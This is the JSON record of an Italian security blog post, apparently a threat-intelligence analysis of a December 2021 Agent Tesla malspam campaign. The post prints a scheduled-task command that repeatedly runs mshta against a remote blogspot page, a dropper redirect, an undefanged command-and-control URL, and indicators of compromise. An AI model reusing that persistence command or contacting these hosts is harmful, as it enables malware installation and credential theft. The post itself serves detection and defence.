{"id":4174,"date":"2021-12-06T15:02:14","date_gmt":"2021-12-06T15:02:14","guid":{"rendered":"https:\/\/fortgale.com\/news\/?p=4174"},"modified":"2023-09-16T10:59:53","modified_gmt":"2023-09-16T10:59:53","slug":"agent-tesla-campagna-malware-del-6-dicembre-2021","status":"publish","type":"post","link":"https:\/\/fortgale.com\/blog\/uncategorized-it\/agent-tesla-campagna-malware-del-6-dicembre-2021\/","title":{"rendered":"Agent Tesla: campagna Malware del 6 Dicembre 2021"},"content":{"rendered":"\n<p><strong>Agent Tesla <\/strong>\u00e8 uno <strong>Spyware <\/strong>che, registrando le sequenze di tasti premuti e le azioni dell&#8217;utente, esfiltra informazioni dai sistemi vittima.<br>Questo Spyware \u00e8 stato creato utilizzando il framework <strong>.Net<\/strong> e trasmette i dati personali al server di comando e controllo (C2). Agent Tesla \u00e8 in grado di accedere alle informazioni salvate nei <strong>browser Web<\/strong>, nei <strong>client di posta elettronica <\/strong>e nei <strong>client FTP<\/strong>.<br>Il malware \u00e8 dotato di meccanismi di <em>evasion <\/em>dell&#8217;<strong>antivirus<\/strong> e di <em>persistenza <\/em>sul sistema per ripartire anche a fronte del riavvio del sistema compromesso. <\/p>\n\n\n\n<p>Negli ultimi giorni \u00e8 stata rilevata una nuova campagna di <strong>malspam<\/strong>. La mail invita l&#8217;utente a scaricare ed aprire l&#8217;allegato.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2021\/12\/image-1.png\" alt=\"\" class=\"wp-image-4176\" width=\"498\" height=\"384\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2021\/12\/image-1.png 719w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2021\/12\/image-1-300x231.png 300w\" sizes=\"(max-width: 498px) 100vw, 498px\" loading=\"lazy\" \/><\/figure>\n<\/div>\n\n\n<p>L&#8217;allegato della mail \u00e8 un file in formato doc che attraverso <strong>mshta.exe<\/strong> contatta il dominio <strong>https:\/\/bitly[.]com\/asdqwdwdsfvcxvccv<\/strong> il quale risponde con il seguente file html:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;html&gt;\n&lt;head&gt;&lt;title&gt;Bitly&lt;\/title&gt;&lt;\/head&gt;\n&lt;body&gt;&lt;a href=\"https:\/\/sqlserviceazure.blogspot&#91;.]com\/p\/bathindasboba&#91;.]html\"&gt;moved here&lt;\/a&gt;&lt;\/body&gt;\n&lt;\/html&gt;<\/code><\/pre>\n\n\n\n<p>Dopo una serie di passaggi viene creato un <strong>task schedulato<\/strong> attraverso il comando:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\"C:\\Windows\\System32\\schtasks.exe\" \/create \/sc MINUTE \/mo 80 \/tn \"\"Bluefibonashi\"\" \/F \/tr \"\"\"\"\\\"\"\"\"MsHtA\"\"\"\"\\\"\"\"\"http:\/\/1230948%1230948@sqlserverserviceagent.blogspot.com\/p\/justtheback.html\\\"\"\"\"<\/code><\/pre>\n\n\n\n<p>Contemporaneamente viene scaricato ed eseguito tramite PowerShell il sample di <strong>Agent Tesla<\/strong>. Il quale inizier\u00e0 a comunicare con il server di comando e controllo attraverso delle <strong>POST <\/strong>a <strong>http:\/\/microsoftazyresql.duckdns.org\/j\/p29oa\/mawa\/eae7bc3b675ad7042607.php<\/strong><\/p>\n\n\n\n<p>Agent Tesla \u00e8 un&nbsp;<strong>keylogger<\/strong>&nbsp;e <strong>data-stealer<\/strong>, capace di rubare le credenziali contenute all&#8217;interno dei principali Browser, oltre ai dati di configurazione e le credenziali di VPN, FTP e client di posta.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" width=\"587\" height=\"150\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2021\/12\/image-2.png\" alt=\"\" class=\"wp-image-4177\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2021\/12\/image-2.png 587w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2021\/12\/image-2-300x77.png 300w\" sizes=\"(max-width: 587px) 100vw, 587px\" loading=\"lazy\" \/><\/figure>\n<\/div>\n\n\n<p class=\"has-large-font-size\"><strong>IOC<\/strong><\/p>\n\n\n\n<p class=\"has-medium-font-size\">File DOC:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Nome <\/strong>invoice#6317236-booking.com,pdf.doc<\/li>\n\n\n\n<li><strong>MD5 <\/strong>d74f268b986fecfa03b81029dd134811<\/li>\n\n\n\n<li><strong>SHA1 <\/strong>d49848ac2888e080883a427ef18b406fdcab6b9b<\/li>\n\n\n\n<li><strong>SHA256 <\/strong>81fcb3dce45b041a91b0c0e01c27e032d7e8d26217d4b6d669ce258b491a830d<\/li>\n<\/ul>\n\n\n\n<p class=\"has-medium-font-size\">Domini:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>C2 <\/strong>\n<ul class=\"wp-block-list\">\n<li>microsoftazyresql.duckdns[.]org <\/li>\n\n\n\n<li>103.147.185[.]68<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Dropper <\/strong>\n<ul class=\"wp-block-list\">\n<li>bitly[.]com<\/li>\n\n\n\n<li>67.199.248[.]14<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Agent Tesla \u00e8 uno Spyware che, registrando le sequenze di tasti premuti e le azioni dell&#8217;utente, esfiltra informazioni dai sistemi vittima.Questo Spyware \u00e8 stato creato utilizzando il framework .Net e trasmette i dati personali al server di comando e controllo (C2). Agent Tesla \u00e8 in grado di accedere alle informazioni salvate nei browser Web, nei [&hellip;]<\/p>\n","protected":false},"author":7,"featured_media":4176,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[954],"tags":[1553,1555,1515,1439,1557],"class_list":["post-4174","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized-it","tag-agent-tesla-it","tag-exfiltration-it","tag-malspam-it","tag-malware-it","tag-spyware-it"],"_links":{"self":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/4174","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/comments?post=4174"}],"version-history":[{"count":7,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/4174\/revisions"}],"predecessor-version":[{"id":5205,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/4174\/revisions\/5205"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/media\/4176"}],"wp:attachment":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/media?parent=4174"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/categories?post=4174"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/tags?post=4174"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}